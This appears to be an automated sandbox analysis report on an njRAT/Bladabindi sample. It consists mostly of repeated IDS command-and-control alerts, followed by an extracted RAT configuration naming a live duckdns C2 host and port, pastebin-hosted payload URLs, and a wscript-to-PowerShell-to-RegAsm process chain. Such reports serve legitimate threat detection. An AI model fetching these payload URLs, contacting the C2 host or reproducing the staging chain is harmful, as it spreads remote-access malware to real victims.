                        2024-09-24T23:43:28.498863+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.503742+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.510071+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.517350+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.522195+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.528027+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.533513+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.594349+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.604145+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.710877+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.717516+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.759578+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.764481+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.783239+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.788142+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.799137+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.803986+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.809192+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.814040+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.819026+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.827339+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.832212+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.837105+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.846874+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.851786+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.857542+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.862461+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.867519+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.872424+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.877351+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.882331+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.887407+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.892222+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.897183+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.903094+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.907995+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.912929+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.922512+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.927408+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.932640+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.937535+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.942495+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.947467+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.952492+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.960206+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.965153+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.974040+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.979034+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.983941+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.990473+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.995400+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.019599+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.024470+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.030352+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.035210+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.040305+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.045233+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.050242+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.056778+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.061704+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.066944+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.071770+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.077268+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.084949+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.089881+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.094780+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.099687+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.104722+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.111648+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.116486+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.121361+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.126408+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.131320+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.138391+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.143468+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.148521+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.153558+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.159422+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.164473+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.171923+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.178235+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.183239+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.188057+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.192942+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.197816+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.206278+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.211298+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.216415+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.222769+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.227690+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.234508+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.239434+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.244394+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.253771+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.261440+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.271520+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.276556+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.296602+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.301512+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.336453+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.365146+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.374403+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.379547+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.385443+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.411311+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.416290+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.421134+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.426067+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.431122+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.436029+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.440890+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.446154+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.451136+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.456217+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.462761+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.467772+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.472832+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.477695+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.482599+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.488589+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.493429+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.498333+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.503224+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.510389+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.516863+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.521699+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.526568+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.531410+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.538302+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.544650+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.551451+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.558176+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.563156+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.568017+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.574246+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.579413+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.584766+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.589663+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.612118+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.616991+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.621931+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.629480+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.634321+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.641756+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.646624+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.654255+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.659347+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.664384+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.696786+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.701969+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.706950+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.712803+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.717756+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.723112+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.728150+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.733043+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.737966+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.745380+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.750254+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.755086+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.759944+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.764884+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.770175+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.775157+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.795804+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.802249+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.834732+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.847551+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.891818+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.901106+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.930283+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.935245+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.940260+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.945085+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.949996+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.978200+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:29.993522+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.000208+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.005502+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.011799+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.017105+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.022324+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.027880+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.058638+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:30.537958+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-24T23:42:24.543018+020028255631Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-24T23:43:09.823180+020028255651Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:13.222752+020028255651Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:20.048232+020028255651Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:22.955511+020028255651Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://ftp.desckvbrat.com.brAvira URL Cloud: Label: malware
                        Source: https://pastebin.com/raw/pQQ0n3eAAvira URL Cloud: Label: malware
                        Source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Njrat {"Host": "notificadoresrma.duckdns.org", "Port": "2054", "Campaign ID": "NYAN CAT", "Network Seprator": "@!#&^%$", "Registry": "a388ab2ca3be4"}
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: unknownHTTPS traffic detected: 76.76.21.22:443 -> 192.168.2.5:49706 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56146 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56147 version: TLS 1.2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:56145 -> 46.246.14.5:2054
                        Source: Network trafficSuricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:56145 -> 46.246.14.5:2054
                        Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:56145 -> 46.246.14.5:2054
                        Source: Network trafficSuricata IDS: 2825565 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP) : 192.168.2.5:56145 -> 46.246.14.5:2054
                        Source: Network trafficSuricata IDS: 2825566 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP) : 192.168.2.5:56145 -> 46.246.14.5:2054
                        Source: unknownDNS query: name: pastebin.com
                        Source: global trafficTCP traffic: 191.252.83.213 ports 1,2,60326,60973,60340,21
                        Source: unknownDNS query: name: notificadoresrma.duckdns.org
                        Source: Yara matchFile source: 4.2.powershell.exe.1d3930c6538.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.powershell.exe.1d3944eae80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 191.252.83.213:60973
                        Source: global trafficTCP traffic: 192.168.2.5:56145 -> 46.246.14.5:2054
                        Source: global trafficHTTP traffic detected: GET /pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw HTTP/1.1Host: pastecodeapp.vercel.appConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw HTTP/1.1Host: pastecodeapp.vercel.app
                        Source: global trafficHTTP traffic detected: GET /pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw HTTP/1.1Host: pastecodeapp.vercel.app
                        Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                        Source: Joe Sandbox ViewIP Address: 191.252.83.213 191.252.83.213
                        Source: Joe Sandbox ViewIP Address: 76.76.21.22 76.76.21.22
                        Source: Joe Sandbox ViewIP Address: 76.76.21.22 76.76.21.22
                        Source: Joe Sandbox ViewASN Name: PORTLANEwwwportlanecomSE PORTLANEwwwportlanecomSE
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: LocawebServicosdeInternetSABR LocawebServicosdeInternetSABR
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
